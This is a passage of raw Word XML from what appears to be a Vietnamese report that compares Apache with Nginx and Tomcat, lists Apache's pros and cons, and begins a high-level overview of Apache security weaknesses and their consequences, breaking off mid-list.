    <w:p w14:paraId="282EDBCA" w14:textId="46F2DF24" w:rsidR="000F16B3" w:rsidRDefault="000F16B3" w:rsidP="000F16B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CA227B1" wp14:editId="2795D0A5">
            <wp:extent cx="3617173" cy="2034540"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="1684853440" name="Picture 4" descr="NGINX vs Apache đâu là sự lựa tốt nhất hiện nay? | VietnamWorks I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NX vs Apache đâu là sự lựa tốt nhất hiện nay? | VietnamWorks InTE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4685" cy="2050014"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A959894" w14:textId="57E76FC4" w:rsidR="000F16B3" w:rsidRPr="00252288" w:rsidRDefault="002C6083" w:rsidP="002C6083">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc170814826"/>
      <w:r>
        <w:t xml:space="preserve">Hình 3. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_3. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000F27E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="008C2FB7">
        <w:t>Apache vs Nginx</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="2AEBAB87" w14:textId="1A5F491E" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC51C9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Điểm khác nhau giữa Apache và Apache Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F71E7B" w14:textId="159028FC" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC51C9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Tomcat được thiết kế dành riêng cho Java. Ngược lại, Apache hỗ trợ nhiều ngôn ngữ lập trình khác (Python PHP,...) và nhiều module Apache khác</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA770A3" w14:textId="2EC23FCB" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC51C9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Hiệu suất của Tomcat trên các trang Web tĩnh không hiệu quả như của Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1B0910" w14:textId="7C745FE6" w:rsidR="00252288" w:rsidRPr="00A03AE4" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC51C9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Việc cấu hình </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC51C9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> sẽ phức tạp và khó khăn hơn Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3213D248" w14:textId="7DD04172" w:rsidR="00A03AE4" w:rsidRDefault="00A03AE4" w:rsidP="00A03AE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A03AE4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="396BA97A" wp14:editId="0A539C71">
            <wp:extent cx="3612035" cy="1965960"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="19942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2408" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3621070" cy="1970878"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F559D8" w14:textId="76C59557" w:rsidR="00A03AE4" w:rsidRPr="00252288" w:rsidRDefault="002C6083" w:rsidP="002C6083">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc170814827"/>
      <w:r>
        <w:t xml:space="preserve">Hình 3. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_3. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000F27E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="004F7575">
        <w:t>Apache vs Tomcat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="1B3777AB" w14:textId="1F8752FD" w:rsidR="00BB6384" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc171085507"/>
      <w:r>
        <w:t>Ưu điểm và nhược điểm của Apache</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="5BC33704" w14:textId="11E43953" w:rsidR="00252288" w:rsidRDefault="00252288" w:rsidP="007902FB">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Ưu điểm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693D0041" w14:textId="72FEB585" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Apache là phần mềm miễn phí</w:t>
      </w:r>
      <w:r w:rsidR="00EC45A8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAD4437" w14:textId="30869CB7" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cấu hình đơn giản và thân thiện</w:t>
      </w:r>
      <w:r w:rsidR="00EC45A8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0E61D8" w14:textId="3736D373" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Apache có độ ổn định và đánh tin cậy</w:t>
      </w:r>
      <w:r w:rsidR="00EC45A8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507186C9" w14:textId="4D5ABABE" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Phần mềm được cập nhật thường xuyên</w:t>
      </w:r>
      <w:r w:rsidR="00EC45A8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E83B96B" w14:textId="2CBAEE4E" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Phát hiện và báo lỗi bảo mật liên tục giúp người dùng ngăn chặn kịp thời, không để thông tin bị đánh cắp</w:t>
      </w:r>
      <w:r w:rsidR="00EC45A8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D79FBE" w14:textId="1A54F3AA" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Có nhiều tài liệu hỗ trợ</w:t>
      </w:r>
      <w:r w:rsidR="00EC45A8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41642A80" w14:textId="5C48129E" w:rsidR="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cộng đồng Apache lớn có thể được giúp đỡ và hỗ trợ dễ dàng</w:t>
      </w:r>
      <w:r w:rsidR="00EC45A8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5FD384" w14:textId="7B77E0DE" w:rsidR="00252288" w:rsidRDefault="00252288" w:rsidP="007902FB">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Nhược điểm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A04960D" w14:textId="0717D7E4" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Có thể chậm hoặc gặp vấn đề trong quá trình truy vấn bởi có nhiều người truy cập Apache cùng một lúc</w:t>
      </w:r>
      <w:r w:rsidR="006C53B8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3F5362" w14:textId="38C1FE1A" w:rsidR="00252288" w:rsidRPr="00252288" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Khả năng bảo mật còn chưa hiệu quả hoàn toàn bởi là một phần mềm mã nguồn mở nên người dùng có thể chọn nhiều cách thiết lập khác nhau</w:t>
      </w:r>
      <w:r w:rsidR="006C53B8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2F6FC3" w14:textId="1D7778ED" w:rsidR="00244454" w:rsidRDefault="00252288" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="53" w:name="_Toc171085508"/>
      <w:r w:rsidR="00663658">
        <w:t>Bảo mật trên Apache</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="7F42E861" w14:textId="05E05B95" w:rsidR="00C8760F" w:rsidRDefault="00513F81" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc171085509"/>
      <w:r>
        <w:t>Vấn đề bảo mật trên Apache</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="3D9600A2" w14:textId="77777777" w:rsidR="005C1A60" w:rsidRDefault="008C2FDD" w:rsidP="002D54E5">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Vấn đề bảo mật với Apache</w:t>
      </w:r>
      <w:r w:rsidR="003B4582">
        <w:t xml:space="preserve"> có thể bao gồm các cuộc tấn công cấp mạng </w:t>
      </w:r>
      <w:r w:rsidR="007877EC">
        <w:t xml:space="preserve">và tấn công cấp hệ điều hành. Thông thường kẻ tấn công nhằm vào bất kì lỗ hổng </w:t>
      </w:r>
      <w:r w:rsidR="00E24202">
        <w:t>hoặc lỗi nào trong cấ</w:t>
      </w:r>
      <w:r w:rsidR="005C1A60">
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00E24202">
        <w:t xml:space="preserve"> hình của Apache và</w:t>
      </w:r>
      <w:r w:rsidR="005C1A60">
        <w:t xml:space="preserve"> thực hiện</w:t>
      </w:r>
      <w:r w:rsidR="00E24202">
        <w:t xml:space="preserve"> khai thác</w:t>
      </w:r>
      <w:r w:rsidR="005C1A60">
        <w:t>. Những lỗ hổng này bao gồm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0100DA5E" w14:textId="366377DB" w:rsidR="00513F81" w:rsidRDefault="002B02C4" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00656A84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sự cho phép không chính xác với các file và thư mục</w:t>
      </w:r>
      <w:r w:rsidR="00B74AEC" w:rsidRPr="00656A84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B74AEC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00476692">
        <w:t>Điều này xảy ra khi các thư mục tập tin trên máy chủ web không được cấp quyền đúng cách, cho phép người dùng không được phép truy cập, chỉnh sửa hoặc xóa tập tin. Quyền truy cập tập tin đúng cách nên hạn chế quyền dựa trên nguyên tắc quyền tối thiểu, đảm bảo rằng chỉ những người dùng và dịch vụ được ủy quyền mới có thể truy cập vào các tập tin nhạy cảm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0785D7EC" w14:textId="6CB89848" w:rsidR="002B02C4" w:rsidRDefault="00C70510" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA0323">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cấu hình mặc định</w:t>
      </w:r>
      <w:r w:rsidR="00656A84" w:rsidRPr="00FA0323">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00656A84">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00417D23">
        <w:t xml:space="preserve">Apache </w:t>
      </w:r>
      <w:r w:rsidR="00146866">
        <w:t>thường đi kèm với các cài đặt mặc định không an toàn. Những cấu hình mặc định này có thể bao gồm tên người dùng và mật khẩu mặc định, các cổng mở hoặc các tập tin và kịch bản mẫu có thể bị khai thác. Kẻ tấn công có thể dễ dàng tìm và khai thác các cài đặt mặc định này nếu chúng không được thay đổi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EFB45A" w14:textId="4DDA1ACB" w:rsidR="00BD5A64" w:rsidRDefault="00BD5A64" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA0323">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bật các </w:t>
      </w:r>
      <w:r w:rsidR="003E5842" w:rsidRPr="00FA0323">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dịch vụ không cần thiết</w:t>
      </w:r>
      <w:r w:rsidR="00146866" w:rsidRPr="00FA0323">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00146866">
        <w:t xml:space="preserve"> Chạy các dịch vụ không cần thiết trên Apache có thể tăng bề mặt tấn công. Mỗi dịch vụ đều có thể có các lỗ hổng mà kẻ tấn công có thể khai thác. Việc vô hiệu hóa bất kỳ dịch vụ nào không cần thiết cho hoạt động của Apache là cần thiết để giảm thiểu các điểm truy cập tiềm năng cho kẻ tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4285F834" w14:textId="5E119263" w:rsidR="00A132AA" w:rsidRDefault="00A132AA" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA0323">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Thiếu bảo mật: </w:t>
      </w:r>
      <w:r w:rsidR="00E940DD">
        <w:t>Danh mục này bao gồm nhiều bảo mật khác nhau, nếu không được thực hiện, có thể để lại máy chủ dễ bị tấn công. Ví dụ bao gồm việc thiếu tường lửa phù hợp, hệ thống phát hiện xâm nhập, các cuộc kiểm tra bảo mật định kỳ và vá lỗi phần mềm kịp thời</w:t>
      </w:r>
      <w:r w:rsidR="00647C11">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56799B8B" w14:textId="5F233966" w:rsidR="00184549" w:rsidRDefault="00184549" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA0323">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lỗi phần mềm:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Các lỗi phần mềm có thể dẫn đến các lỗ hổng mà kẻ tấn công có thể khai thác. Những lỗi này có thể tồn tại trong chính phần mềm </w:t>
      </w:r>
      <w:r w:rsidR="008B7078">
        <w:t>Apache</w:t>
      </w:r>
      <w:r>
        <w:t>, trong hệ điều hành nền tảng hoặc trong bất kỳ ứng dụng nào chạy trên máy chủ. Giữ cho phần mềm luôn được cập nhật với các bản vá mới nhất là rất quan trọng để giảm thiểu rủi ro do lỗi phần mềm gây ra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAE2A40" w14:textId="520D5E35" w:rsidR="00547785" w:rsidRPr="00513F81" w:rsidRDefault="00C16036" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA0323">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cấu hình chứng chỉ SSL sai</w:t>
      </w:r>
      <w:r w:rsidR="00330902" w:rsidRPr="00FA0323">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00330902">
        <w:t xml:space="preserve"> Chứng chỉ SSL (TLS) được sử dụng để mã hóa dữ liệu được truyền giữa máy chủ web và các khách hàng. Nếu chứng chỉ SSL bị cấu hình sai, có thể dẫn đến mã hóa yếu, làm cho kẻ tấn công dễ dàng chặn và đọc dữ liệu nhạy cảm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272D55B0" w14:textId="0682DC01" w:rsidR="00A96ED2" w:rsidRDefault="008C78AC" w:rsidP="00A91F6A">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Quản trị viên Apache phải đảm bảo loại bỏ tất cả các lỗ hổng và triển khai các biện pháp bảo mật</w:t>
      </w:r>
      <w:r w:rsidR="00122A4F">
        <w:t>. Khi bị xâm nhập, hậu quả có thể rất nghiêm trọng, bao gồm</w:t>
      </w:r>
      <w:r w:rsidR="00330D68">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146E3E16" w14:textId="3BA279B2" w:rsidR="00961FB7" w:rsidRDefault="00587042" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Xâm phạm tất cả các tài khoản người dùng</w:t>
      </w:r>
      <w:r>
        <w:t>: Tất cả các tài khoản người dùng trên máy chủ có thể bị đánh cắp hoặc kiểm soát bởi kẻ tấn công, dẫn đến mất mát hoặc lạm dụng thông tin cá nhân và dữ liệu nhạy cảm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B05C42" w14:textId="35041BEF" w:rsidR="00587042" w:rsidRDefault="00587042" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Từ chối các dịch vụ mà máy chủ cung cấp</w:t>
      </w:r>
      <w:r>
